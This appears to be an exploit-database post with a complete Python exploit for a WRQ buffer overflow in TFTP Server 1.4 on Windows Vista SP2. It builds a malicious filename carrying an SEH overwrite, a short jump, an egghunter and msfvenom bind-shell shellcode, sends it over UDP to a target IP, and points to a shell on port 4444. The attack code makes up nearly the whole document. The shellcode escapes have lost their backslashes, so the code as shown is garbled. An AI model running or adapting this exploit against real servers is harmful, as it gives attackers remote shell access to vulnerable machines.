TFTP Server 1.4 WRQ Buffer Overflow
Posted on 22 July 2016
# Exploit Title: [TFTP Server 1.4 - WRQ Buffer Overflow Exploit [Egghunter]] # Exploit Author: [Karn Ganeshen] # Vendor Homepage: [http://sourceforge.net/projects/tftp-server/] # Version: [1.4] # Tested on: [Windows Vista SP2] # # Coded this for Vista Ultimate, Service Pack 2 # 3-byte overwrite + short jump + Egghunter # Standalone mode # # Couple of overflow exploits already here for this tftp, none for Vista SP2 + Egghunter: # http://www.exploit-db.com/exploits/5314/ # http://www.exploit-db.com/exploits/10542/ # http://www.exploit-db.com/exploits/5563/ # https://www.exploit-db.com/exploits/18345/ # #!/usr/bin/python import socket import sys host = '192.168.49.187' port = 69 try: s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) # msfvenom -p windows/shell_bind_tcp LHOST=192.168.49.187 -b x00 EXITFUNC=seh -f c -e x86/alpha_mixed # Payload size: 718 bytes shellcode = ( "x89xe5xd9xcfxd9x75xf4x5dx55x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x59x6cx48x68x4fx72x75x50x63x30x33x30x33x50x6f" "x79x59x75x35x61x6fx30x51x74x6cx4bx42x70x46x50" "x6ex6bx62x72x66x6cx6cx4bx73x62x56x74x6cx4bx43" "x42x45x78x66x6fx58x37x73x7ax56x46x54x71x4bx4f" "x6ex4cx45x6cx50x61x51x6cx33x32x74x6cx61x30x4b" "x71x68x4fx74x4dx63x31x39x57x58x62x68x72x76x32" "x71x47x4ex6bx52x72x64x50x4cx4bx30x4ax45x6cx6c" "x4bx30x4cx36x71x50x78x68x63x70x48x76x61x6bx61" "x43x61x4ex6bx61x49x45x70x63x31x48x53x4cx4bx72" "x69x35x48x38x63x77x4ax77x39x6cx4bx65x64x4cx4b" "x67x71x58x56x75x61x4bx4fx6cx6cx69x51x7ax6fx76" "x6dx65x51x39x57x45x68x4dx30x34x35x6ax56x45x53" "x53x4dx5ax58x47x4bx53x4dx77x54x43x45x4dx34x73" "x68x6cx4bx61x48x57x54x46x61x6bx63x61x76x6cx4b" "x74x4cx42x6bx4cx4bx30x58x57x6cx75x51x79x43x4c" "x4bx33x34x6ex6bx46x61x4ex30x4bx39x73x74x56x44" "x65x74x63x6bx43x6bx63x51x52x79x53x6ax66x31x59" "x6fx6bx50x33x6fx33x6fx32x7ax6ex6bx35x42x78x6b" "x4ex6dx43x6dx62x48x37x43x46x52x37x70x35x50x61" "x78x72x57x64x33x45x62x71x4fx56x34x53x58x32x6c" "x63x47x34x66x46x67x4bx4fx6ax75x4ex58x4ex70x43" "x31x75x50x35x50x31x39x6fx34x72x74x70x50x55x38" "x56x49x4fx70x30x6bx47x70x69x6fx48x55x71x7ax36" "x68x51x49x70x50x4ax42x4bx4dx61x50x76x30x33x70" "x36x30x35x38x69x7ax64x4fx59x4fx6bx50x39x6fx4b" "x65x7ax37x73x58x43x32x63x30x56x71x71x4cx6cx49" "x69x76x71x7ax64x50x53x66x72x77x73x58x4ax62x79" "x4bx50x37x65x37x39x6fx6bx65x36x37x42x48x48x37" "x4bx59x47x48x6bx4fx39x6fx4bx65x51x47x51x78x50" "x74x5ax4cx65x6bx79x71x69x6fx6ax75x51x47x4fx67" "x53x58x61x65x32x4ex32x6dx70x61x49x6fx69x45x61" "x78x72x43x32x4dx30x64x43x30x4bx39x4ax43x70x57" "x53x67x72x77x64x71x48x76x31x7ax52x32x42x79x52" "x76x38x62x69x6dx65x36x4bx77x37x34x61x34x47x4c" "x57x71x45x51x6cx4dx77x34x44x64x72x30x78x46x53" "x30x67x34x33x64x32x70x70x56x73x66x42x76x62x66" "x46x36x30x4ex63x66x46x36x42x73x62x76x52x48x71" "x69x38x4cx35x6fx6ex66x79x6fx49x45x4cx49x4bx50" "x52x6ex43x66x30x46x59x6fx54x70x62x48x34x48x6c" "x47x35x4dx55x30x39x6fx38x55x4fx4bx59x6ex34x4e" "x76x52x59x7ax73x58x6dx76x6cx55x4dx6dx4dx4dx4b" "x4fx6ex35x47x4cx63x36x71x6cx45x5ax4fx70x49x6b" "x59x70x74x35x76x65x4dx6bx50x47x32x33x32x52x30" "x6fx62x4ax45x50x66x33x69x6fx4ex35x41x41") # PPR - 0x0040CC22 - in TFTPServerSP.exe # 3-byte overwrite jump_one = "xEBxDBx90x90" # negative jump back egghunter = ("x66x81xcaxffx0fx42x52x6a" #WOOT "x02x58xcdx2ex3cx05x5ax74" "xefxb8x54x30x30x57x8bxfa" "xafx75xeaxafx75xe7xffxe7") filename = "x90"*734 + "T00WT00W" + shellcode + "x90"*10 + egghunter + "x90"*10 + jump_one + "x22xCCx40" mode = "netascii" evil = "x00x02" + filename + "x00" + mode + "x00" print "[*] Sending evil packet, ph33r" s.sendto(evil, (host, port)) print "[*] Check port 4444 for bindshell"